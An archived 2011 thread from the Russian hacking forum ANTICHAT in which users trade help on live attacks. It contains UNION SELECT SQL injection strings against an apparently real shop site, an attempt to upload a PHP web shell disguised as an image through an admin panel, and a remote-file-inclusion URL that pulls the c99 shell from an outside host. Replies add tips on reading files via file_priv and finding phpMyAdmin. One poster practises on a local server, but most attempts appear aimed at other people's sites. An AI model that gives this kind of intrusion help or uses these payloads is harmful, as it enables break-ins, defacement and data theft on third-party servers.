ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
07.01.2011, 20:20
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
пускай даже я не могу ее найти.
Интересно, что можно делать используя sql
|
|
|
07.01.2011, 20:28
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от jecka3000
jecka3000 said:
пускай даже я не могу ее найти.
Интересно, что можно делать используя sql
если у тебя иньекция в запросе селект то можеш только "слить" как ты сказал выше. редактировать и тп ни как не сможеш
смотри file_priv у пользователя, если повезет сможеш еще файлы читать.
смотри права на базу mysql, ищи PMA..
больше ничего.
дефейсы на ачате не обсуждаются.
|
|
|
|
07.01.2011, 22:03
|
|
Познающий
Регистрация: 20.07.2007
Сообщений: 99
Провел на форуме:
1562993
Репутация:
25
|
|
Есть запрос вида
/newslist.php?box=5
пишу newslist.php?box=5+and+1=0+union+select+1,2,3,4,5+--
эот уже определил что 5 столбцов, выводит ошибку вида:
Warning: ibase_query() [function.ibase-query]: Dynamic SQL Error SQL error code = -104 Unexpected end of command - line 1, column 92 in /ishop/www/tid1/newslist.php on line 35
А если без коментирования остатка (newslist.php?box=5+and+1=0+union+select+1,2,3,4,5 +)запроса то такую ошибку:
Warning: ibase_query() [function.ibase-query]: Dynamic SQL Error SQL error code = -104 Token unknown - line 1, column 95 order in /ishop/www/tid1/newslist.php on line 35
Warning: ibase_fetch_object(): supplied argument is not a valid Firebird/InterBase result resource in /ishop/www/tid1/newslist.php on line 36
Как дальше раскрутить это все дело?.. во всех этих моментах нету вывода куда либо кроме того где ошибки=\
|
|
|
|
07.01.2011, 22:07
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
NorB
/threadedpost1826253.html
|
|
|
|
07.01.2011, 22:10
|
|
Познающий
Регистрация: 20.07.2007
Сообщений: 99
Провел на форуме:
1562993
Репутация:
25
|
|
Сообщение от Konqi
Konqi said:
NorB
/threadedpost1826253.html
Огромное спасибо, мне нраааааавица ваше прикольна %) чета новенькое изучу%)
|
|
|
|
08.01.2011, 00:37
|
|
Познающий
Регистрация: 18.09.2006
Сообщений: 43
Провел на форуме:
468989
Репутация:
3
|
|
Всем доброго времени!!Есть админка!!заливаю картинку с содержимым шелла!выдает хрень Warning: realpath() [function.realpath]: SAFE MODE Restriction in effect. The script whose uid is 99 is not allowed to access!Но если залить с содержимым,ну например $a=5;echo $a;то все нормуль!не подскажите че может быть?
|
|
|
|
08.01.2011, 13:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от street16
street16 said:
Всем доброго времени!!Есть админка!!заливаю картинку с содержимым шелла!выдает хрень Warning: realpath() [function.realpath]: SAFE MODE Restriction in effect. The script whose uid is 99 is not allowed to access!Но если залить с содержимым,ну например $a=5;echo $a;то все нормуль!не подскажите че может быть?
Не понятно. Жалуется он очевидно почему, потому что на сервере включен режим SAFE MODE, и владелец каталога куда заливается шелл отличен от владельца загружаемого шелла.
Непонятно то, почему у тебя исполняется как ты написал:
[qoute] $a=5;echo $a[/qoute]
|
|
|
|
09.01.2011, 05:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
3820
Репутация:
0
|
|
Тренеруюсь на локальном сервере в sql-inj
Вот такой запрос к бд в скрипте.
Сообщение от None
$a = $_GET["req"];
SELECT `id`,`text` FROM `sqltable` WHERE `id` = $a
Делаю скулю так
Сообщение от None
%URL%?req=1+union+selest+1,2
И так:
Сообщение от None
%URL%?req=1+union+selest+1,2--
Ошибка:
Сообщение от None
Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in ...
ERROR 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'selest 1,2' at line 1
Если в скрипте прописать так:
Сообщение от None
SELECT `id`,`text` FROM `sqltable` WHERE `id` = '$a' union SELECT 1,2
То всё работает.
Столбцов в таблице 2, записей 3.
В чём моя ошибка?
ps: Использовал оператор group by всё нормально работает, а с union никак не хочет. |
|
|
|
09.01.2011, 05:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
8717
Репутация:
-1
|
|
Вопрос может и глупый, но раньше я никогда не стыкался с заливкой шелла. И вот решил попробовать.
ххх.com/index.php?con=http://site.com/c99madshell
на страице открывает шелл , с моим сайтом. ТАк должно быть ?
потом перехожу
ххх.com/с99madshell.php но такого файла нет. В чем проблема собствено. ?
Если нада доп. инфа говорите.
|
|
|
|
09.01.2011, 05:36
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от pycmep
pycmep said:
Тренеруюсь на локальном сервере в sql-inj
Вот такой запрос к бд в скрипте.
Делаю скулю так
И так:
Ошибка:
Если в скрипте прописать так:
То всё работает.
Столбцов в таблице 2, записей 3.
В чём моя ошибка?
ps: Использовал оператор
group by
всё нормально работает, а с
union
никак не хочет.
Вероятно, потому что в первом примере, ты пишешь selest, вместо select
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
